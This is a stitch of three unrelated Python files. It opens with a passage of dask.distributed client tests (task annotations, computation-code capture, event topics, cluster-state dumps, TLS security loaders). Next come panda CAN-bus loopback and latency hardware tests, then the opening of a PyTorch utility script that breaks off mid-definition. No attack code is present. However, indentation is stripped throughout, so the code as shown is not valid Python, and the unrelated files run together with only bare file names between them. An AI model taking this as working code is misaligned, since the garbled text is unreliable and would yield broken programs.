assert events[1][1] == ("alice", "bob")
@gen_cluster(client=True)
async def test_annotations_task_state(c, s, a, b):
da = pytest.importorskip("dask.array")
with dask.annotate(qux="bar", priority=100):
x = da.ones(10, chunks=(5,))
with dask.config.set(optimization__fuse__active=False):
x = await x.persist()
assert all(
{"qux": "bar", "priority": 100} == ts.annotations for ts in s.tasks.values()
)
@pytest.mark.parametrize("fn", ["compute", "persist"])
@gen_cluster(client=True)
async def test_annotations_compute_time(c, s, a, b, fn):
da = pytest.importorskip("dask.array")
x = da.ones(10, chunks=(5,))
with dask.annotate(foo="bar"):
# Turn off optimization to avoid rewriting layers and picking up annotations
# that way. Instead, we want `compute`/`persist` to be able to pick them up.
fut = getattr(c, fn)(x, optimize_graph=False)
await wait(fut)
assert s.tasks
assert all(ts.annotations == {"foo": "bar"} for ts in s.tasks.values())
@pytest.mark.xfail(reason="https://github.com/dask/dask/issues/7036")
@gen_cluster(client=True)
async def test_annotations_survive_optimization(c, s, a, b):
da = pytest.importorskip("dask.array")
with dask.annotate(foo="bar"):
x = da.ones(10, chunks=(5,))
ann = x.__dask_graph__().layers[x.name].annotations
assert ann is not None
assert ann.get("foo", None) == "bar"
(xx,) = dask.optimize(x)
ann = xx.__dask_graph__().layers[x.name].annotations
assert ann is not None
assert ann.get("foo", None) == "bar"
@gen_cluster(client=True)
async def test_annotations_priorities(c, s, a, b):
da = pytest.importorskip("dask.array")
with dask.annotate(priority=15):
x = da.ones(10, chunks=(5,))
with dask.config.set(optimization__fuse__active=False):
x = await x.persist()
assert all("15" in str(ts.priority) for ts in s.tasks.values())
assert all(ts.priority[0] == -15 for ts in s.tasks.values())
assert all({"priority": 15} == ts.annotations for ts in s.tasks.values())
@gen_cluster(client=True)
async def test_annotations_workers(c, s, a, b):
da = pytest.importorskip("dask.array")
with dask.annotate(workers=[a.address]):
x = da.ones(10, chunks=(5,))
with dask.config.set(optimization__fuse__active=False):
x = await x.persist()
assert all({"workers": (a.address,)} == ts.annotations for ts in s.tasks.values())
assert all({a.address} == ts.worker_restrictions for ts in s.tasks.values())
assert a.data
assert not b.data
@gen_cluster(client=True)
async def test_annotations_retries(c, s, a, b):
da = pytest.importorskip("dask.array")
with dask.annotate(retries=2):
x = da.ones(10, chunks=(5,))
with dask.config.set(optimization__fuse__active=False):
x = await x.persist()
assert all(ts.retries == 2 for ts in s.tasks.values())
assert all(ts.annotations == {"retries": 2} for ts in s.tasks.values())
@gen_cluster(client=True)
async def test_annotations_blockwise_unpack(c, s, a, b):
da = pytest.importorskip("dask.array")
np = pytest.importorskip("numpy")
from dask.array.utils import assert_eq
# A flaky doubling function -- need extra args because it is called before
# application to establish dtype/meta.
scale = varying([ZeroDivisionError("one"), ZeroDivisionError("two"), 2, 2])
def flaky_double(x):
return scale() * x
# A reliable double function.
def reliable_double(x):
return 2 * x
x = da.ones(10, chunks=(5,))
# The later annotations should not override the earlier annotations
with dask.annotate(retries=2):
y = x.map_blocks(flaky_double, meta=np.array((), dtype=float))
with dask.annotate(retries=0):
z = y.map_blocks(reliable_double, meta=np.array((), dtype=float))
with dask.config.set(optimization__fuse__active=False):
z = await c.compute(z)
assert_eq(z, np.ones(10) * 4.0)
@gen_cluster(
client=True,
nthreads=[
("127.0.0.1", 1),
("127.0.0.1", 1, {"resources": {"GPU": 1}}),
],
)
async def test_annotations_resources(c, s, a, b):
da = pytest.importorskip("dask.array")
with dask.annotate(resources={"GPU": 1}):
x = da.ones(10, chunks=(5,))
with dask.config.set(optimization__fuse__active=False):
x = await x.persist()
assert all([{"GPU": 1} == ts.resource_restrictions for ts in s.tasks.values()])
assert all([{"resources": {"GPU": 1}} == ts.annotations for ts in s.tasks.values()])
@gen_cluster(
client=True,
nthreads=[
("127.0.0.1", 1),
("127.0.0.1", 1, {"resources": {"GPU": 1}}),
],
)
async def test_annotations_resources_culled(c, s, a, b):
da = pytest.importorskip("dask.array")
x = da.ones((2, 2, 2), chunks=1)
with dask.annotate(resources={"GPU": 1}):
y = x.map_blocks(lambda x0: x0, meta=x._meta)
z = y[0, 0, 0]
(z,) = c.compute([z], optimize_graph=False)
await z
# it worked!
@gen_cluster(client=True)
async def test_annotations_loose_restrictions(c, s, a, b):
da = pytest.importorskip("dask.array")
# Eventually fails if allow_other_workers=False
with dask.annotate(workers=["fake"], allow_other_workers=True):
x = da.ones(10, chunks=(5,))
with dask.config.set(optimization__fuse__active=False):
x = await x.persist()
assert all(not ts.worker_restrictions for ts in s.tasks.values())
assert all({"fake"} == ts.host_restrictions for ts in s.tasks.values())
assert all(
[
{"workers": ("fake",), "allow_other_workers": True} == ts.annotations
for ts in s.tasks.values()
]
)
@gen_cluster(client=True)
async def test_workers_collection_restriction(c, s, a, b):
da = pytest.importorskip("dask.array")
future = c.compute(da.arange(10), workers=a.address)
await future
assert a.data and not b.data
@gen_cluster(client=True, nthreads=[("127.0.0.1", 0)])
async def test_get_client_functions_spawn_clusters(c, s, a):
# see gh4565
scheduler_addr = c.scheduler.address
def f(x):
with LocalCluster(
n_workers=1,
processes=False,
dashboard_address=":0",
worker_dashboard_address=":0",
) as cluster2:
with Client(cluster2) as c1:
c2 = get_client()
c1_scheduler = c1.scheduler.address
c2_scheduler = c2.scheduler.address
assert c1_scheduler != c2_scheduler
assert c2_scheduler == scheduler_addr
await c.gather(c.map(f, range(2)))
await a.close()
c_default = default_client()
assert c is c_default
def test_computation_code_walk_frames():
test_function_code = inspect.getsource(test_computation_code_walk_frames)
code = Client._get_computation_code()
assert test_function_code == code
def nested_call():
return Client._get_computation_code()
assert nested_call() == inspect.getsource(nested_call)
with pytest.raises(TypeError, match="Ignored modules must be a list"):
with dask.config.set(
{"distributed.diagnostics.computations.ignore-modules": "test_client"}
):
code = Client._get_computation_code()
with dask.config.set(
{"distributed.diagnostics.computations.ignore-modules": ["test_client"]}
):
import sys
upper_frame_code = inspect.getsource(sys._getframe(1))
code = Client._get_computation_code()
assert code == upper_frame_code
assert nested_call() == upper_frame_code
def test_computation_object_code_dask_compute(client):
da = pytest.importorskip("dask.array")
x = da.ones((10, 10), chunks=(3, 3))
future = x.sum().compute()
y = future
test_function_code = inspect.getsource(test_computation_object_code_dask_compute)
def fetch_comp_code(dask_scheduler):
computations = list(dask_scheduler.computations)
assert len(computations) == 1
comp = computations[0]
assert len(comp.code) == 1
return comp.code[0]
code = client.run_on_scheduler(fetch_comp_code)
assert code == test_function_code
def test_computation_object_code_not_available(client):
np = pytest.importorskip("numpy")
pd = pytest.importorskip("pandas")
dd = pytest.importorskip("dask.dataframe")
df = pd.DataFrame({"a": range(10)})
ddf = dd.from_pandas(df, npartitions=3)
result = np.where(ddf.a > 4)
def fetch_comp_code(dask_scheduler):
computations = list(dask_scheduler.computations)
assert len(computations) == 1
comp = computations[0]
assert len(comp.code) == 1
return comp.code[0]
code = client.run_on_scheduler(fetch_comp_code)
assert code == "<Code not available>"
@gen_cluster(client=True)
async def test_computation_object_code_dask_persist(c, s, a, b):
da = pytest.importorskip("dask.array")
x = da.ones((10, 10), chunks=(3, 3))
future = x.sum().persist()
await future
test_function_code = inspect.getsource(
test_computation_object_code_dask_persist.__wrapped__
)
computations = list(s.computations)
assert len(computations) == 1
comp = computations[0]
assert len(comp.code) == 1
assert comp.code[0] == test_function_code
@gen_cluster(client=True)
async def test_computation_object_code_client_submit_simple(c, s, a, b):
def func(x):
return x
fut = c.submit(func, 1)
await fut
test_function_code = inspect.getsource(
test_computation_object_code_client_submit_simple.__wrapped__
)
computations = list(s.computations)
assert len(computations) == 1
comp = computations[0]
assert len(comp.code) == 1
assert comp.code[0] == test_function_code
@gen_cluster(client=True)
async def test_computation_object_code_client_submit_list_comp(c, s, a, b):
def func(x):
return x
futs = [c.submit(func, x) for x in range(10)]
await c.gather(futs)
test_function_code = inspect.getsource(
test_computation_object_code_client_submit_list_comp.__wrapped__
)
computations = list(s.computations)
assert len(computations) == 1
comp = computations[0]
# Code is deduplicated
assert len(comp.code) == 1
assert comp.code[0] == test_function_code
@gen_cluster(client=True)
async def test_computation_object_code_client_submit_dict_comp(c, s, a, b):
def func(x):
return x
futs = {x: c.submit(func, x) for x in range(10)}
await c.gather(futs)
test_function_code = inspect.getsource(
test_computation_object_code_client_submit_dict_comp.__wrapped__
)
computations = list(s.computations)
assert len(computations) == 1
comp = computations[0]
# Code is deduplicated
assert len(comp.code) == 1
assert comp.code[0] == test_function_code
@gen_cluster(client=True)
async def test_computation_object_code_client_map(c, s, a, b):
da = pytest.importorskip("dask.array")
x = da.ones((10, 10), chunks=(3, 3))
future = c.compute(x.sum(), retries=2)
y = await future
test_function_code = inspect.getsource(
test_computation_object_code_client_map.__wrapped__
)
computations = list(s.computations)
assert len(computations) == 1
comp = computations[0]
assert len(comp.code) == 1
assert comp.code[0] == test_function_code
@gen_cluster(client=True)
async def test_computation_object_code_client_compute(c, s, a, b):
da = pytest.importorskip("dask.array")
x = da.ones((10, 10), chunks=(3, 3))
future = c.compute(x.sum(), retries=2)
y = await future
test_function_code = inspect.getsource(
test_computation_object_code_client_compute.__wrapped__
)
computations = list(s.computations)
assert len(computations) == 1
comp = computations[0]
assert len(comp.code) == 1
assert comp.code[0] == test_function_code
@gen_cluster(client=True, Worker=Nanny)
async def test_upload_directory(c, s, a, b, tmp_path):
from dask.distributed import UploadDirectory
# Be sure to exclude code coverage reports
files_start = {f for f in os.listdir() if not f.startswith(".coverage")}
with open(tmp_path / "foo.py", "w") as f:
f.write("x = 123")
with open(tmp_path / "bar.py", "w") as f:
f.write("from foo import x")
plugin = UploadDirectory(tmp_path, restart=True, update_path=True)
await c.register_worker_plugin(plugin)
[name] = a.plugins
assert os.path.split(tmp_path)[-1] in name
def f():
import bar
return bar.x
results = await c.run(f)
assert results[a.worker_address] == 123
assert results[b.worker_address] == 123
async with Nanny(s.address, local_directory=tmp_path / "foo", name="foo") as n:
results = await c.run(f)
assert results[n.worker_address] == 123
files_end = {f for f in os.listdir() if not f.startswith(".coverage")}
assert files_start == files_end # no change
@gen_cluster(client=True)
async def test_exception_text(c, s, a, b):
def bad(x):
raise Exception(x)
future = c.submit(bad, 123)
await wait(future)
ts = s.tasks[future.key]
assert isinstance(ts.exception_text, str)
assert "123" in ts.exception_text
assert "Exception(x)" in ts.traceback_text
assert "bad" in ts.traceback_text
@gen_cluster(client=True)
async def test_async_task(c, s, a, b):
async def f(x):
return x + 1
future = c.submit(f, 10)
result = await future
assert result == 11
@gen_cluster(client=True)
async def test_async_task_with_partial(c, s, a, b):
async def f(x, y):
return x + y + 1
future = c.submit(functools.partial(f, 1), 10)
result = await future
assert result == 12
@gen_cluster(client=True, nthreads=[("", 1)])
async def test_events_subscribe_topic(c, s, a):
log = []
def user_event_handler(event):
log.append(event)
c.subscribe_topic("test-topic", user_event_handler)
while not s.event_subscriber["test-topic"]:
await asyncio.sleep(0.01)
a.log_event("test-topic", {"important": "event"})
while len(log) != 1:
await asyncio.sleep(0.01)
time_, msg = log[0]
assert isinstance(time_, float)
assert msg == {"important": "event"}
c.unsubscribe_topic("test-topic")
while s.event_subscriber["test-topic"]:
await asyncio.sleep(0.01)
a.log_event("test-topic", {"forget": "me"})
while len(s.events["test-topic"]) == 1:
await asyncio.sleep(0.01)
assert len(log) == 1
async def async_user_event_handler(event):
log.append(event)
await asyncio.sleep(0)
c.subscribe_topic("test-topic", async_user_event_handler)
while not s.event_subscriber["test-topic"]:
await asyncio.sleep(0.01)
a.log_event("test-topic", {"async": "event"})
while len(log) == 1:
await asyncio.sleep(0.01)
assert len(log) == 2
time_, msg = log[1]
assert isinstance(time_, float)
assert msg == {"async": "event"}
    # Even though the middle event was not subscribed to, the scheduler still
    # knows about all of them, so we can retrieve them
all_events = await c.get_events(topic="test-topic")
assert len(all_events) == 3
@gen_cluster(client=True, nthreads=[("", 1)])
async def test_events_subscribe_topic_cancelled(c, s, a):
event_handler_started = asyncio.Event()
exc_info = None
async def user_event_handler(event):
nonlocal exc_info
c.unsubscribe_topic("test-topic")
event_handler_started.set()
with pytest.raises(asyncio.CancelledError) as exc_info:
await asyncio.sleep(0.5)
c.subscribe_topic("test-topic", user_event_handler)
while not s.event_subscriber["test-topic"]:
await asyncio.sleep(0.01)
a.log_event("test-topic", {})
await event_handler_started.wait()
await c._close(fast=True)
assert exc_info is not None
@gen_cluster(client=True, nthreads=[("", 1)])
async def test_events_all_servers_use_same_channel(c, s, a):
"""Ensure that logs from all server types (scheduler, worker, nanny)
and the clients themselves arrive"""
log = []
def user_event_handler(event):
log.append(event)
c.subscribe_topic("test-topic", user_event_handler)
while not s.event_subscriber["test-topic"]:
await asyncio.sleep(0.01)
async with Nanny(s.address) as n:
a.log_event("test-topic", "worker")
n.log_event("test-topic", "nanny")
s.log_event("test-topic", "scheduler")
await c.log_event("test-topic", "client")
while not len(log) == 4 == len(set(log)):
await asyncio.sleep(0.1)
@gen_cluster(client=True, nthreads=[])
async def test_events_unsubscribe_raises_if_unknown(c, s):
with pytest.raises(ValueError, match="No event handler known for topic unknown"):
c.unsubscribe_topic("unknown")
@gen_cluster(client=True)
async def test_log_event_warn(c, s, a, b):
def foo():
get_worker().log_event(["foo", "warn"], "Hello!")
with pytest.warns(Warning, match="Hello!"):
await c.submit(foo)
@gen_cluster(client=True)
async def test_log_event_warn_dask_warns(c, s, a, b):
from dask.distributed import warn
def foo():
warn("Hello!")
with pytest.warns(Warning, match="Hello!"):
await c.submit(foo)
@gen_cluster(client=True, Worker=Nanny)
async def test_print(c, s, a, b, capsys):
from dask.distributed import print
def foo():
print("Hello!", 123, sep=":")
await c.submit(foo)
out, err = capsys.readouterr()
assert "Hello!:123" in out
@gen_cluster(client=True, Worker=Nanny)
async def test_print_non_msgpack_serializable(c, s, a, b, capsys):
from dask.distributed import print
def foo():
print(object())
await c.submit(foo)
out, err = capsys.readouterr()
assert "<object object at" in out
def test_print_simple(capsys):
from dask.distributed import print
print("Hello!", 123, sep=":")
out, err = capsys.readouterr()
assert "Hello!:123" in out
def _verify_cluster_dump(url, format: str, addresses: set[str]) -> dict:
fsspec = pytest.importorskip("fsspec")
url = str(url)
if format == "msgpack":
import msgpack
url += ".msgpack.gz"
loader = msgpack.unpack
else:
import yaml
url += ".yaml"
loader = yaml.safe_load
with fsspec.open(url, mode="rb", compression="infer") as f:
state = loader(f)
assert isinstance(state, dict)
assert "scheduler" in state
assert "workers" in state
assert "versions" in state
assert state["workers"].keys() == addresses
return state
def test_dump_cluster_state_write_from_scheduler(
c, s, a, b, tmp_path, monkeypatch: pytest.MonkeyPatch
):
monkeypatch.chdir(tmp_path)
scheduler_dir = tmp_path / "scheduler"
scheduler_dir.mkdir()
c.run_on_scheduler(os.chdir, str(scheduler_dir))
c.dump_cluster_state("not-url")
assert (tmp_path / "not-url.msgpack.gz").is_file()
c.dump_cluster_state("file://is-url")
assert (scheduler_dir / "is-url.msgpack.gz").is_file()
c.dump_cluster_state("file://local-explicit", write_from_scheduler=False)
assert (tmp_path / "local-explicit.msgpack.gz").is_file()
c.dump_cluster_state("scheduler-explicit", write_from_scheduler=True)
assert (scheduler_dir / "scheduler-explicit.msgpack.gz").is_file()
@pytest.mark.parametrize("local", [True, False])
@pytest.mark.parametrize("_format", ["msgpack", "yaml"])
def test_dump_cluster_state_sync(c, s, a, b, tmp_path, _format, local):
filename = tmp_path / "foo"
if not local:
pytest.importorskip("fsspec")
# Make it look like an fsspec path
filename = f"file://{filename}"
c.dump_cluster_state(filename, format=_format)
_verify_cluster_dump(filename, _format, {a["address"], b["address"]})
@pytest.mark.parametrize("local", [True, False])
@pytest.mark.parametrize("_format", ["msgpack", "yaml"])
@gen_cluster(client=True)
async def test_dump_cluster_state_async(c, s, a, b, tmp_path, _format, local):
filename = tmp_path / "foo"
if not local:
pytest.importorskip("fsspec")
# Make it look like an fsspec path
filename = f"file://{filename}"
await c.dump_cluster_state(filename, format=_format)
_verify_cluster_dump(filename, _format, {a.address, b.address})
@pytest.mark.parametrize("local", [True, False])
@gen_cluster(client=True)
async def test_dump_cluster_state_json(c, s, a, b, tmp_path, local):
filename = tmp_path / "foo"
if not local:
pytest.importorskip("fsspec")
# Make it look like an fsspec path
filename = f"file://{filename}"
with pytest.raises(ValueError, match="Unsupported format"):
await c.dump_cluster_state(filename, format="json")
@gen_cluster(client=True)
async def test_dump_cluster_state_exclude_default(c, s, a, b, tmp_path):
futs = c.map(inc, range(10))
while len(s.tasks) != len(futs):
await asyncio.sleep(0.01)
excluded_by_default = [
"run_spec",
]
filename = tmp_path / "foo"
await c.dump_cluster_state(
filename=filename,
format="yaml",
)
with open(f"{filename}.yaml") as fd:
state = yaml.safe_load(fd)
assert "workers" in state
assert len(state["workers"]) == len(s.workers)
for worker, worker_dump in state["workers"].items():
for k, task_dump in worker_dump["tasks"].items():
assert not any(blocked in task_dump for blocked in excluded_by_default)
assert k in s.tasks
assert "scheduler" in state
assert "tasks" in state["scheduler"]
tasks = state["scheduler"]["tasks"]
assert len(tasks) == len(futs)
for k, task_dump in tasks.items():
assert not any(blocked in task_dump for blocked in excluded_by_default)
assert k in s.tasks
await c.dump_cluster_state(
filename=filename,
format="yaml",
exclude=(),
)
with open(f"{filename}.yaml") as fd:
state = yaml.safe_load(fd)
assert "workers" in state
assert len(state["workers"]) == len(s.workers)
for worker, worker_dump in state["workers"].items():
for k, task_dump in worker_dump["tasks"].items():
assert all(blocked in task_dump for blocked in excluded_by_default)
assert k in s.tasks
assert "scheduler" in state
assert "tasks" in state["scheduler"]
tasks = state["scheduler"]["tasks"]
assert len(tasks) == len(futs)
for k, task_dump in tasks.items():
assert all(blocked in task_dump for blocked in excluded_by_default)
assert k in s.tasks
class TestClientSecurityLoader:
@contextmanager
def config_loader(self, monkeypatch, loader):
module_name = "totally_fake_module_name_1"
module = types.ModuleType(module_name)
module.loader = loader
with monkeypatch.context() as m:
m.setitem(sys.modules, module_name, module)
with dask.config.set(
{"distributed.client.security-loader": f"{module_name}.loader"}
):
yield
@pytest.mark.asyncio
async def test_security_loader(self, monkeypatch):
security = tls_only_security()
async with Scheduler(
dashboard_address=":0", protocol="tls", security=security
) as scheduler:
def loader(info):
assert info == {"address": scheduler.address}
return security
with self.config_loader(monkeypatch, loader):
async with Client(scheduler.address, asynchronous=True) as client:
assert client.security is security
@pytest.mark.asyncio
async def test_security_loader_ignored_if_explicit_security_provided(
self, monkeypatch
):
security = tls_only_security()
def loader(info):
assert False
async with Scheduler(
dashboard_address=":0", protocol="tls", security=security
) as scheduler:
with self.config_loader(monkeypatch, loader):
async with Client(
scheduler.address, security=security, asynchronous=True
) as client:
assert client.security is security
@pytest.mark.asyncio
async def test_security_loader_ignored_if_returns_none(self, monkeypatch):
"""Test that if a security loader is configured, but it returns `None`,
then the default security configuration is used"""
ca_file = get_cert("tls-ca-cert.pem")
keycert = get_cert("tls-key-cert.pem")
config = {
"distributed.comm.require-encryption": True,
"distributed.comm.tls.ca-file": ca_file,
"distributed.comm.tls.client.cert": keycert,
"distributed.comm.tls.scheduler.cert": keycert,
"distributed.comm.tls.worker.cert": keycert,
}
def loader(info):
loader.called = True
return None
with dask.config.set(config):
async with Scheduler(dashboard_address=":0", protocol="tls") as scheduler:
# Smoketest to make sure config was picked up (so we're actually testing something)
assert scheduler.security.tls_client_cert
assert scheduler.security.tls_scheduler_cert
with self.config_loader(monkeypatch, loader):
async with Client(scheduler.address, asynchronous=True) as client:
assert (
client.security.tls_client_cert
== scheduler.security.tls_client_cert
)
assert loader.called
@pytest.mark.asyncio
async def test_security_loader_import_failed(self):
security = tls_only_security()
with dask.config.set(
{"distributed.client.security-loader": "totally_fake_module_name_2.loader"}
):
with pytest.raises(ImportError, match="totally_fake_module_name_2.loader"):
async with Client("tls://bad-address:8888", asynchronous=True):
pass
@gen_cluster(client=True, nthreads=[])
async def test_wait_for_workers_updates_info(c, s):
async with Worker(s.address):
await c.wait_for_workers(1)
assert c.scheduler_info()["workers"]
|
4_can_loopback.py
|
import os
import time
import random
import threading
from panda import Panda
from collections import defaultdict
from nose.tools import assert_equal, assert_less, assert_greater
from .helpers import panda_jungle, start_heartbeat_thread, reset_pandas, time_many_sends, test_all_pandas, test_all_gen2_pandas, clear_can_buffers, panda_connect_and_init
# Reset the pandas before running tests
def aaaa_reset_before_tests():
reset_pandas()
@test_all_pandas
@panda_connect_and_init
def test_send_recv(p):
def test(p_send, p_recv):
p_send.set_can_loopback(False)
p_recv.set_can_loopback(False)
p_send.can_send_many([(0x1ba, 0, b"message", 0)] * 2)
time.sleep(0.05)
p_recv.can_recv()
p_send.can_recv()
busses = [0, 1, 2]
for bus in busses:
for speed in [100, 250, 500, 750, 1000]:
p_send.set_can_speed_kbps(bus, speed)
p_recv.set_can_speed_kbps(bus, speed)
time.sleep(0.05)
clear_can_buffers(p_send)
clear_can_buffers(p_recv)
comp_kbps = time_many_sends(p_send, bus, p_recv, two_pandas=True)
saturation_pct = (comp_kbps / speed) * 100.0
assert_greater(saturation_pct, 80)
assert_less(saturation_pct, 100)
print("two pandas bus {}, 100 messages at speed {:4d}, comp speed is {:7.2f}, percent {:6.2f}".format(bus, speed, comp_kbps, saturation_pct))
# Start heartbeat
start_heartbeat_thread(p)
# Set safety mode and power saving
p.set_safety_mode(Panda.SAFETY_ALLOUTPUT)
p.set_power_save(False)
try:
# Run tests in both directions
test(p, panda_jungle)
test(panda_jungle, p)
except Exception as e:
# Raise errors again, we don't want them to get lost
raise e
finally:
# Set back to silent mode
p.set_safety_mode(Panda.SAFETY_SILENT)
@test_all_pandas
@panda_connect_and_init
def test_latency(p):
def test(p_send, p_recv):
p_send.set_can_loopback(False)
p_recv.set_can_loopback(False)
p_send.set_can_speed_kbps(0, 100)
p_recv.set_can_speed_kbps(0, 100)
time.sleep(0.05)
p_send.can_send_many([(0x1ba, 0, b"testmsg", 0)] * 10)
time.sleep(0.05)
p_recv.can_recv()
p_send.can_recv()
busses = [0, 1, 2]
for bus in busses:
for speed in [100, 250, 500, 750, 1000]:
p_send.set_can_speed_kbps(bus, speed)
p_recv.set_can_speed_kbps(bus, speed)
time.sleep(0.1)
# clear can buffers
clear_can_buffers(p_send)
clear_can_buffers(p_recv)
latencies = []
comp_kbps_list = []
saturation_pcts = []
num_messages = 100
for i in range(num_messages):
st = time.time()
p_send.can_send(0x1ab, b"message", bus)
r = []
while len(r) < 1 and (time.time() - st) < 5:
r = p_recv.can_recv()
et = time.time()
r_echo = []
while len(r_echo) < 1 and (time.time() - st) < 10:
r_echo = p_send.can_recv()
if len(r) == 0 or len(r_echo) == 0:
print("r: {}, r_echo: {}".format(r, r_echo))
assert_equal(len(r), 1)
assert_equal(len(r_echo), 1)
et = (et - st) * 1000.0
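          # 108 bits for a standard-ID CAN frame carrying 8 data bytes:
          # SOF(1) + ID(11) + RTR(1) + IDE(1) + r0(1) + DLC(4) + data(64)
          # + CRC(15) + CRC delim(1) + ACK(1) + ACK delim(1) + EOF(7).
          # et is in milliseconds, so bits / ms gives kbit/s.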
comp_kbps = (1 + 11 + 1 + 1 + 1 + 4 + 8 * 8 + 15 + 1 + 1 + 1 + 7) / et
latency = et - ((1 + 11 + 1 + 1 + 1 + 4 + 8 * 8 + 15 + 1 + 1 + 1 + 7) / speed)
assert_less(latency, 5.0)
saturation_pct = (comp_kbps / speed) * 100.0
latencies.append(latency)
comp_kbps_list.append(comp_kbps)
saturation_pcts.append(saturation_pct)
average_latency = sum(latencies) / num_messages
assert_less(average_latency, 1.0)
average_comp_kbps = sum(comp_kbps_list) / num_messages
average_saturation_pct = sum(saturation_pcts) / num_messages
print("two pandas bus {}, {} message average at speed {:4d}, latency is {:5.3f}ms, comp speed is {:7.2f}, percent {:6.2f}"
.format(bus, num_messages, speed, average_latency, average_comp_kbps, average_saturation_pct))
# Start heartbeat
start_heartbeat_thread(p)
# Set safety mode and power saving
p.set_safety_mode(Panda.SAFETY_ALLOUTPUT)
p.set_power_save(False)
try:
# Run tests in both directions
test(p, panda_jungle)
test(panda_jungle, p)
except Exception as e:
# Raise errors again, we don't want them to get lost
raise e
finally:
# Set back to silent mode
p.set_safety_mode(Panda.SAFETY_SILENT)
@test_all_gen2_pandas
@panda_connect_and_init
def test_gen2_loopback(p):
def test(p_send, p_recv, address=None):
for bus in range(4):
obd = False
if bus == 3:
obd = True
bus = 1
# Clear buses
clear_can_buffers(p_send)
clear_can_buffers(p_recv)
# Send a random string
addr = address if address else random.randint(1, 2000)
string = b"test" + os.urandom(4)
p_send.set_obd(obd)
p_recv.set_obd(obd)
time.sleep(0.2)
p_send.can_send(addr, string, bus)
time.sleep(0.2)
content = p_recv.can_recv()
      # Check the number of messages
assert len(content) == 1
# Check content
assert content[0][0] == addr and content[0][2] == string
# Check bus
assert content[0][3] == bus
print("Bus:", bus, "address:", addr, "OBD:", obd, "OK")
# Start heartbeat
start_heartbeat_thread(p)
# Set safety mode and power saving
p.set_safety_mode(Panda.SAFETY_ALLOUTPUT)
p.set_power_save(False)
try:
# Run tests in both directions
test(p, panda_jungle)
test(panda_jungle, p)
# Test extended frame address with ELM327 mode
p.set_safety_mode(Panda.SAFETY_ELM327)
test(p, panda_jungle, 0x18DB33F1)
test(panda_jungle, p, 0x18DB33F1)
except Exception as e:
# Raise errors again, we don't want them to get lost
raise e
finally:
# Set back to silent mode
p.set_safety_mode(Panda.SAFETY_SILENT)
@test_all_pandas
@panda_connect_and_init
def test_bulk_write(p):
  # The TX buffers on pandas are 0x100 in length.
NUM_MESSAGES_PER_BUS = 10000
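  # Queueing far more frames than fit in the TX ring buffer forces the firmware
  # to drain and refill it repeatedly while the host keeps writing.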
def flood_tx(panda):
print('Sending!')
msg = b"\xaa" * 8
packet = []
# start with many messages on a single bus (higher contention for single TX ring buffer)
packet += [[0xaa, None, msg, 0]] * NUM_MESSAGES_PER_BUS
# end with many messages on multiple buses
packet += [[0xaa, None, msg, 0], [0xaa, None, msg, 1], [0xaa, None, msg, 2]] * NUM_MESSAGES_PER_BUS
# Disable timeout
panda.can_send_many(packet, timeout=0)
print(f"Done sending {4 * NUM_MESSAGES_PER_BUS} messages!")
# Start heartbeat
start_heartbeat_thread(p)
# Set safety mode and power saving
p.set_safety_mode(Panda.SAFETY_ALLOUTPUT)
p.set_power_save(False)
  # Start transmission
threading.Thread(target=flood_tx, args=(p,)).start()
  # Receive as much as we can over a period of a few seconds
rx = []
old_len = 0
start_time = time.time()
while time.time() - start_time < 5 or len(rx) > old_len:
old_len = len(rx)
rx.extend(panda_jungle.can_recv())
print(f"Received {len(rx)} messages")
# All messages should have been received
if len(rx) != 4 * NUM_MESSAGES_PER_BUS:
raise Exception("Did not receive all messages!")
# Set back to silent mode
p.set_safety_mode(Panda.SAFETY_SILENT)
@test_all_pandas
@panda_connect_and_init
def test_message_integrity(p):
start_heartbeat_thread(p)
clear_can_buffers(p)
p.set_safety_mode(Panda.SAFETY_ALLOUTPUT)
p.set_power_save(False)
p.set_can_loopback(True)
n = 250
for i in range(n):
sent_msgs = defaultdict(set)
for _ in range(random.randrange(10)):
to_send = []
for __ in range(random.randrange(100)):
bus = random.randrange(3)
addr = random.randrange(1, 1<<29)
dat = bytes([random.getrandbits(8) for _ in range(random.randrange(1, 9))])
sent_msgs[bus].add((addr, dat))
to_send.append([addr, None, dat, bus])
p.can_send_many(to_send, timeout=0)
start_time = time.time()
while time.time() - start_time < 2 and any(len(sent_msgs[bus]) for bus in range(3)):
recvd = p.can_recv()
for msg in recvd:
if msg[3] >= 128:
k = (msg[0], bytes(msg[2]))
          assert k in sent_msgs[msg[3] - 128], f"message {k} was never sent on bus {msg[3] - 128}"
sent_msgs[msg[3]-128].discard(k)
# if a set isn't empty, messages got dropped
for bus in range(3):
assert not len(sent_msgs[bus]), f"loop {i}: bus {bus} missing {len(sent_msgs[bus])} messages"
# Set back to silent mode
p.set_safety_mode(Panda.SAFETY_SILENT)
print("Got all messages intact")
|
single_script.py
|
# Python standard library modules
import copy
import os
import logging
import threading
import time
import queue
from collections import deque
import warnings
import itertools
from functools import partial
# Third party libraries
import numpy as np
from tqdm import tqdm
try:
import matplotlib
import matplotlib.pyplot as plt
except ImportError:
matplotlib = None
plt = None
# Pytorch
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import Variable # DO NOT REMOVE
print("Using PyTorch version:", torch.__version__)
### UTILS ###
def resettable(f):
"""
    Decorator to make a Python object resettable. Note that this will
    not work with inheritance. To reset an object, simply call its reset
    method.
"""
def __init_and_copy__(self, *args, **kwargs):
        f(self, *args, **kwargs)
def reset(o=self):
o.__dict__ = o.__original_dict__
o.__original_dict__ = copy.deepcopy(self.__dict__)
self.reset = reset
self.__original_dict__ = copy.deepcopy(self.__dict__)
return __init_and_copy__
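# Illustrative usage sketch (hypothetical example class, not part of the original
# code): decorate __init__ with @resettable, mutate the instance, then call
# reset() to restore the state captured right after construction.
class _ResettableExample(object):
    @resettable
    def __init__(self):
        self.count = 0
# e.g. ex = _ResettableExample(); ex.count += 5; ex.reset()  # count is 0 again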
def safe_open_dir(dirpath):
if not os.path.isdir(dirpath):
logging.info("Directory %s does not exist, creating it" % dirpath)
os.makedirs(dirpath)
return dirpath
### BACKEND ###
# Define the global backend variables
epsilon = 1e-11
channels_mode = "channels_first"
logging.info(f"PyJet using config: epsilon={epsilon}, channels_mode"
"={channels_mode}")
# Set up the use of cuda if available
use_cuda = torch.cuda.is_available()
def cudaFloatTensor(x):
# Optimization for casting things to cuda tensors
return torch.FloatTensor(x).cuda()
def cudaLongTensor(x):
return torch.LongTensor(x).cuda()
def cudaByteTensor(x):
return torch.ByteTensor(x).cuda()
def cudaZeros(*args):
return torch.zeros(*args).cuda()
def cudaOnes(*args):
return torch.ones(*args).cuda()
def flatten(x):
